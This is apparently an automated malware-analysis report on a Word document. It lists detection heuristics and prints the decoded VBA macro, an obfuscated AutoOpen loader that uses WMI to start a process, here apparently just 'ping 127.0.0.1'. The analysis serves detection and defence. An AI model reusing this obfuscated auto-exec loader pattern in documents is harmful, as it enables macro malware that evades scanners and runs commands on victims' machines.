MALICIOUS
190
Risk Score
Heuristics 7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
GetObject(nx_brj7kk30r_1_0h1o9dcfc_77de1975__vwhf15oj0xu3gzpk_z09p0zx_ed9zedvw38yxwb8df8jy_u8at).Get(i7k7jtv_txr2hrobm4d5u0jr0c47niai62h43v3y8x28yjbtc8ln2jys6bmhofos9r1yn4so0gvc79o06trabokirj).Create nhg3t464l2f_tzmfjwf0am8glkqpr36w7mmxa8udxlgunalyrorpuuuuowq27lhcxphqyu3n3rd38b69b2ab828oh8f, n3jba1inpw70icwg8org7rjgraiuro787l8vh2yc4asicgt1dnmppsnwn_57qcqbeyykefsze1bwc4cnp_sj5w7qb, n3jba1inpw70icwg8org7rjgraiuro787l8vh2yc4asicgt1dnmppsnwn_57qcqbeyykefsze1bwc4cnp_sj5w7qb, i_jfo4b8myafc798bqtl92auv … -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
GetObject(nx_brj7kk30r_1_0h1o9dcfc_77de1975__vwhf15oj0xu3gzpk_z09p0zx_ed9zedvw38yxwb8df8jy_u8at).Get(i7k7jtv_txr2hrobm4d5u0jr0c47niai62h43v3y8x28yjbtc8ln2jys6bmhofos9r1yn4so0gvc79o06trabokirj).Create nhg3t464l2f_tzmfjwf0am8glkqpr36w7mmxa8udxlgunalyrorpuuuuowq27lhcxphqyu3n3rd38b69b2ab828oh8f, n3jba1inpw70icwg8org7rjgraiuro787l8vh2yc4asicgt1dnmppsnwn_57qcqbeyykefsze1bwc4cnp_sj5w7qb, n3jba1inpw70icwg8org7rjgraiuro787l8vh2yc4asicgt1dnmppsnwn_57qcqbeyykefsze1bwc4cnp_sj5w7qb, i_jfo4b8myafc798bqtl92auv … -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10401 bytes |
SHA-256: 9126cf76d8365c3f4c865036a1fd3b65938b7d474201ff8735faaddd20b0f848 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
f_4v176sres_gosp4m6yawrrlkwbxnd23lfs323nb7tr4go7b_lz44h8yii_43bwnr8k74vbzyk4p2yve
End Sub
Sub f_4v176sres_gosp4m6yawrrlkwbxnd23lfs323nb7tr4go7b_lz44h8yii_43bwnr8k74vbzyk4p2yve()
Dim qvsmt9vyhg1cgpaj80j03g1ielpnk57emf0spu_txy27_ayjy8ozga7_w55f5ghu8vg61k6lhhkmyc4kg0vt1aih4qle8aj1dq0l As String
Dim nhg3t464l2f_tzmfjwf0am8glkqpr36w7mmxa8udxlgunalyrorpuuuuowq27lhcxphqyu3n3rd38b69b2ab828oh8f As String
qvsmt9vyhg1cgpaj80j03g1ielpnk57emf0spu_txy27_ayjy8ozga7_w55f5ghu8vg61k6lhhkmyc4kg0vt1aih4qle8aj1dq0l = "212205210203132149150155146148146148146149"
nhg3t464l2f_tzmfjwf0am8glkqpr36w7mmxa8udxlgunalyrorpuuuuowq27lhcxphqyu3n3rd38b69b2ab828oh8f = rn1mz0zn34_iiyymbj6dahuxbsekoua2_hu3xt7tb3ke2742fpptpg3_so57qiib89tfl9qc1rhkxj7(qvsmt9vyhg1cgpaj80j03g1ielpnk57emf0spu_txy27_ayjy8ozga7_w55f5ghu8vg61k6lhhkmyc4kg0vt1aih4qle8aj1dq0l)
On Error Resume Next
If ActiveDocument.Name <> rn1mz0zn34_iiyymbj6dahuxbsekoua2_hu3xt7tb3ke2742fpptpg3_so57qiib89tfl9qc1rhkxj7("204201208208211146200211199") Then
Exit Sub
End If
On Error GoTo 0
Dim nx_brj7kk30r_1_0h1o9dcfc_77de1975__vwhf15oj0xu3gzpk_z09p0zx_ed9zedvw38yxwb8df8jy_u8at As String
Dim i7k7jtv_txr2hrobm4d5u0jr0c47niai62h43v3y8x28yjbtc8ln2jys6bmhofos9r1yn4so0gvc79o06trabokirj As String
Dim i_jfo4b8myafc798bqtl92auvfg9b_bnpunwdcd7ar_6tgpx4ynaw660c6ihc_q_4o1ajnkuitu9qj1e3poxk__o4r0axcv6 As Variant
Dim n3jba1inpw70icwg8org7rjgraiuro787l8vh2yc4asicgt1dnmppsnwn_57qcqbeyykefsze1bwc4cnp_sj5w7qb As Variant
nx_brj7kk30r_1_0h1o9dcfc_77de1975__vwhf15oj0xu3gzpk_z09p0zx_ed9zedvw38yxwb8df8jy_u8at = rn1mz0zn34_iiyymbj6dahuxbsekoua2_hu3xt7tb3ke2742fpptpg3_so57qiib89tfl9qc1rhkxj7("219205210209203209216215158192192146192214211211216192199205209218150")
i7k7jtv_txr2hrobm4d5u0jr0c47niai62h43v3y8x28yjbtc8ln2jys6bmhofos9r1yn4so0gvc79o06trabokirj = rn1mz0zn34_iiyymbj6dahuxbsekoua2_hu3xt7tb3ke2742fpptpg3_so57qiib89tfl9qc1rhkxj7("187205210151150195180214211199201215215")
n3jba1inpw70icwg8org7rjgraiuro787l8vh2yc4asicgt1dnmppsnwn_57qcqbeyykefsze1bwc4cnp_sj5w7qb = Null
GetObject(nx_brj7kk30r_1_0h1o9dcfc_77de1975__vwhf15oj0xu3gzpk_z09p0zx_ed9zedvw38yxwb8df8jy_u8at).Get(i7k7jtv_txr2hrobm4d5u0jr0c47niai62h43v3y8x28yjbtc8ln2jys6bmhofos9r1yn4so0gvc79o06trabokirj).Create nhg3t464l2f_tzmfjwf0am8glkqpr36w7mmxa8udxlgunalyrorpuuuuowq27lhcxphqyu3n3rd38b69b2ab828oh8f, n3jba1inpw70icwg8org7rjgraiuro787l8vh2yc4asicgt1dnmppsnwn_57qcqbeyykefsze1bwc4cnp_sj5w7qb, n3jba1inpw70icwg8org7rjgraiuro787l8vh2yc4asicgt1dnmppsnwn_57qcqbeyykefsze1bwc4cnp_sj5w7qb, i_jfo4b8myafc798bqtl92auvfg9b_bnpunwdcd7ar_6tgpx4ynaw660c6ihc_q_4o1ajnkuitu9qj1e3poxk__o4r0axcv6
End Sub
Function tebkxpupuwk137tct7qkgsp_imvx22pdwnpnr3myl6wrgoy_sfisxdh92y2qv86ae2ktkxill2u41gq7l(EwEzUQXdDBaJZwBWymxYzQSDF)
tebkxpupuwk137tct7qkgsp_imvx22pdwnpnr3myl6wrgoy_sfisxdh92y2qv86ae2ktkxill2u41gq7l = Chr(EwEzUQXdDBaJZwBWymxYzQSDF - 100)
End Function
Function o3pi7oj4z47hmxvnkc9uy3xvkg0o7tpxn9du_h4i46oh74fu427m3ar20pdt46upquud8tsw391gwt(BoYxVZOoOfsQzTgHCeRQcmmLTZcjKeCubBVNPx)
o3pi7oj4z47hmxvnkc9uy3xvkg0o7tpxn9du_h4i46oh74fu427m3ar20pdt46upquud8tsw391gwt = Left(BoYxVZOoOfsQzTgHCeRQcmmLTZcjKeCubBVNPx, 3)
End Function
Function ykd9p6qwr0cc0g7jo31gsd7aqdxuhwlv3rx6co4at3qgt7dvj85_z6uemg2uh9xysnxi2gr72oqn3fiq96f1kf9fwmr(ytjtQVKAOOrRCfOTiYKkBVqtsYQMndYYzWVjjVHhiqyGsCg)
ykd9p6qwr0cc0g7jo31gsd7aqdxuhwlv3rx6co4at3qgt7dvj85_z6uemg2uh9xysnxi2gr72oqn3fiq96f1kf9fwmr = Right(ytjtQVKAOOrRCfOTiYKkBVqtsYQMndYYzWVjjVHhiqyGsCg, Len(ytjtQVKAOOrRCfOTiYKkBVqtsYQMndYYzWVjjVHhiqyGsCg) - 3)
End Function
Function rn1mz0zn34_iiyymbj6dahuxbsekoua2_hu3xt7tb3ke2742fpptpg3_so57qiib89tfl9qc1rhkxj7(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj)
Do
OBIpsEgAPnGsVlQdEcOljijPlscYLOvnxa = OBIpsEgAPnGsVlQdEcOljijPlscYLOvnxa + tebkxpupuwk137tct7qkgsp_imvx22pdwnpnr3myl6wrgoy_sfisxdh92y2qv86ae2ktkxill2u41gq7l(o3pi7oj4z47hmxvnkc9uy3xvkg0o7tpxn9du_h4i46oh74fu427m3ar20pdt46upquud8tsw391gwt(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj))
HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj = ykd9p6qwr0cc0g7jo31gsd7aqdxuhwlv3rx6co4at3qgt7dvj85_z6uemg2uh9xysnxi2gr72oqn3fiq96f1kf9fwmr(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj)
Loop While Len(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj) > 0
rn1mz0zn34_iiyymbj6dahuxbsekoua2_hu3xt7tb3ke2742fpptpg3_so57qiib89tfl9qc1rhkxj7 = OBIpsEgAPnGsVlQdEcOljijPlscYLOvnxa
End Function
' Processing file: /opt/analyzer/scan_staging/fd653fe6c12a4a7ea93be6af9beca77b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1090 bytes
' Macros/VBA/NewMacros - 7604 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' ArgsCall _B_var_b234l6bmzleggtmfhllu66b03da_yv0rum3qwpuu34mvv79e48li0ew 0x0000
' Line #2:
' EndSub
' Line #3:
' FuncDefn (Sub _B_var_b234l6bmzleggtmfhllu66b03da_yv0rum3qwpuu34mvv79e48li0ew())
' Line #4:
' Dim
' VarDefn f_4v176sres_gosp4m6yawrrlkwbxnd23lfs323nb7tr4go7b_lz44h8yii_43bwnr8k74vbzyk4p2yve (As String)
' Line #5:
' Dim
' VarDefn qvsmt9vyhg1cgpaj80j03g1ielpnk57emf0spu_txy27_ayjy8ozga7_w55f5ghu8vg61k6lhhkmyc4kg0vt1aih4qle8aj1dq0l (As String)
' Line #6:
' LitStr 0x002A "212205210203132149150155146148146148146149"
' St f_4v176sres_gosp4m6yawrrlkwbxnd23lfs323nb7tr4go7b_lz44h8yii_43bwnr8k74vbzyk4p2yve
' Line #7:
' Ld f_4v176sres_gosp4m6yawrrlkwbxnd23lfs323nb7tr4go7b_lz44h8yii_43bwnr8k74vbzyk4p2yve
' ArgsLd nhg3t464l2f_tzmfjwf0am8glkqpr36w7mmxa8udxlgunalyrorpuuuuowq27lhcxphqyu3n3rd38b69b2ab828oh8f 0x0001
' St qvsmt9vyhg1cgpaj80j03g1ielpnk57emf0spu_txy27_ayjy8ozga7_w55f5ghu8vg61k6lhhkmyc4kg0vt1aih4qle8aj1dq0l
' Line #8:
' OnError (Resume Next)
' Line #9:
' Ld ActiveDocument
' MemLd Name
' LitStr 0x001B "204201208208211146200211199"
' ArgsLd nhg3t464l2f_tzmfjwf0am8glkqpr36w7mmxa8udxlgunalyrorpuuuuowq27lhcxphqyu3n3rd38b69b2ab828oh8f 0x0001
' Ne
' IfBlock
' Line #10:
' ExitSub
' Line #11:
' EndIfBlock
' Line #12:
' OnError (GoTo 0)
' Line #13:
' Dim
' VarDefn rn1mz0zn34_iiyymbj6dahuxbsekoua2_hu3xt7tb3ke2742fpptpg3_so57qiib89tfl9qc1rhkxj7 (As String)
' Line #14:
' Dim
' VarDefn nx_brj7kk30r_1_0h1o9dcfc_77de1975__vwhf15oj0xu3gzpk_z09p0zx_ed9zedvw38yxwb8df8jy_u8at (As String)
' Line #15:
' Dim
' VarDefn i7k7jtv_txr2hrobm4d5u0jr0c47niai62h43v3y8x28yjbtc8ln2jys6bmhofos9r1yn4so0gvc79o06trabokirj (As Variant)
' Line #16:
' Dim
' VarDefn i_jfo4b8myafc798bqtl92auvfg9b_bnpunwdcd7ar_6tgpx4ynaw660c6ihc_q_4o1ajnkuitu9qj1e3poxk__o4r0axcv6 (As Variant)
' Line #17:
' LitStr 0x0045 "219205210209203209216215158192192146192214211211216192199205209218150"
' ArgsLd nhg3t464l2f_tzmfjwf0am8glkqpr36w7mmxa8udxlgunalyrorpuuuuowq27lhcxphqyu3n3rd38b69b2ab828oh8f 0x0001
' St rn1mz0zn34_iiyymbj6dahuxbsekoua2_hu3xt7tb3ke2742fpptpg3_so57qiib89tfl9qc1rhkxj7
' Line #18:
' LitStr 0x0027 "187205210151150195180214211199201215215"
' ArgsLd nhg3t464l2f_tzmfjwf0am8glkqpr36w7mmxa8udxlgunalyrorpuuuuowq27lhcxphqyu3n3rd38b69b2ab828oh8f 0x0001
' St nx_brj7kk30r_1_0h1o9dcfc_77de1975__vwhf15oj0xu3gzpk_z09p0zx_ed9zedvw38yxwb8df8jy_u8at
' Line #19:
' LitVarSpecial (Null)
' St i_jfo4b8myafc798bqtl92auvfg9b_bnpunwdcd7ar_6tgpx4ynaw660c6ihc_q_4o1ajnkuitu9qj1e3poxk__o4r0axcv6
' Line #20:
' Ld qvsmt9vyhg1cgpaj80j03g1ielpnk57emf0spu_txy27_ayjy8ozga7_w55f5ghu8vg61k6lhhkmyc4kg0vt1aih4qle8aj1dq0l
' Ld i_jfo4b8myafc798bqtl92auvfg9b_bnpunwdcd7ar_6tgpx4ynaw660c6ihc_q_4o1ajnkuitu9qj1e3poxk__o4r0axcv6
' Ld i_jfo4b8myafc798bqtl92auvfg9b_bnpunwdcd7ar_6tgpx4ynaw660c6ihc_q_4o1ajnkuitu9qj1e3poxk__o4r0axcv6
' Ld i7k7jtv_txr2hrobm4d5u0jr0c47niai62h43v3y8x28yjbtc8ln2jys6bmhofos9r1yn4so0gvc79o06trabokirj
' Ld nx_brj7kk30r_1_0h1o9dcfc_77de1975__vwhf15oj0xu3gzpk_z09p0zx_ed9zedvw38yxwb8df8jy_u8at
' Ld rn1mz0zn34_iiyymbj6dahuxbsekoua2_hu3xt7tb3ke2742fpptpg3_so57qiib89tfl9qc1rhkxj7
' ArgsLd GetObject 0x0001
' ArgsMemLd Get 0x0001
' ArgsMemCall Create 0x0004
' Line #21:
' EndSub
' Line #22:
' FuncDefn (Function n3jba1inpw70icwg8org7rjgraiuro787l8vh2yc4asicgt1dnmppsnwn_57qcqbeyykefsze1bwc4cnp_sj5w7qb(EwEzUQXdDBaJZwBWymxYzQSDF))
' Line #23:
' Ld EwEzUQXdDBaJZwBWymxYzQSDF
' LitDI2 0x0064
' Sub
' ArgsLd Chr 0x0001
' St n3jba1inpw70icwg8org7rjgraiuro787l8vh2yc4asicgt1dnmppsnwn_57qcqbeyykefsze1bwc4cnp_sj5w7qb
' Line #24:
' EndFunc
' Line #25:
' FuncDefn (Function tebkxpupuwk137tct7qkgsp_imvx22pdwnpnr3myl6wrgoy_sfisxdh92y2qv86ae2ktkxill2u41gq7l(BoYxVZOoOfsQzTgHCeRQcmmLTZcjKeCubBVNPx))
' Line #26:
' Ld BoYxVZOoOfsQzTgHCeRQcmmLTZcjKeCubBVNPx
' LitDI2 0x0003
' ArgsLd Left 0x0002
' St tebkxpupuwk137tct7qkgsp_imvx22pdwnpnr3myl6wrgoy_sfisxdh92y2qv86ae2ktkxill2u41gq7l
' Line #27:
' EndFunc
' Line #28:
' FuncDefn (Function o3pi7oj4z47hmxvnkc9uy3xvkg0o7tpxn9du_h4i46oh74fu427m3ar20pdt46upquud8tsw391gwt(ytjtQVKAOOrRCfOTiYKkBVqtsYQMndYYzWVjjVHhiqyGsCg))
' Line #29:
' Ld ytjtQVKAOOrRCfOTiYKkBVqtsYQMndYYzWVjjVHhiqyGsCg
' Ld ytjtQVKAOOrRCfOTiYKkBVqtsYQMndYYzWVjjVHhiqyGsCg
' FnLen
' LitDI2 0x0003
' Sub
' ArgsLd Right 0x0002
' St o3pi7oj4z47hmxvnkc9uy3xvkg0o7tpxn9du_h4i46oh74fu427m3ar20pdt46upquud8tsw391gwt
' Line #30:
' EndFunc
' Line #31:
' FuncDefn (Function nhg3t464l2f_tzmfjwf0am8glkqpr36w7mmxa8udxlgunalyrorpuuuuowq27lhcxphqyu3n3rd38b69b2ab828oh8f(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj))
' Line #32:
' Do
' Line #33:
' Ld OBIpsEgAPnGsVlQdEcOljijPlscYLOvnxa
' Ld HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj
' ArgsLd tebkxpupuwk137tct7qkgsp_imvx22pdwnpnr3myl6wrgoy_sfisxdh92y2qv86ae2ktkxill2u41gq7l 0x0001
' ArgsLd n3jba1inpw70icwg8org7rjgraiuro787l8vh2yc4asicgt1dnmppsnwn_57qcqbeyykefsze1bwc4cnp_sj5w7qb 0x0001
' Add
' St OBIpsEgAPnGsVlQdEcOljijPlscYLOvnxa
' Line #34:
' Ld HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj
' ArgsLd o3pi7oj4z47hmxvnkc9uy3xvkg0o7tpxn9du_h4i46oh74fu427m3ar20pdt46upquud8tsw391gwt 0x0001
' St HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj
' Line #35:
' Ld HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj
' FnLen
' LitDI2 0x0000
' Gt
' LoopWhile
' Line #36:
' Ld OBIpsEgAPnGsVlQdEcOljijPlscYLOvnxa
' St nhg3t464l2f_tzmfjwf0am8glkqpr36w7mmxa8udxlgunalyrorpuuuuowq27lhcxphqyu3n3rd38b69b2ab828oh8f
' Line #37:
' EndFunc
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.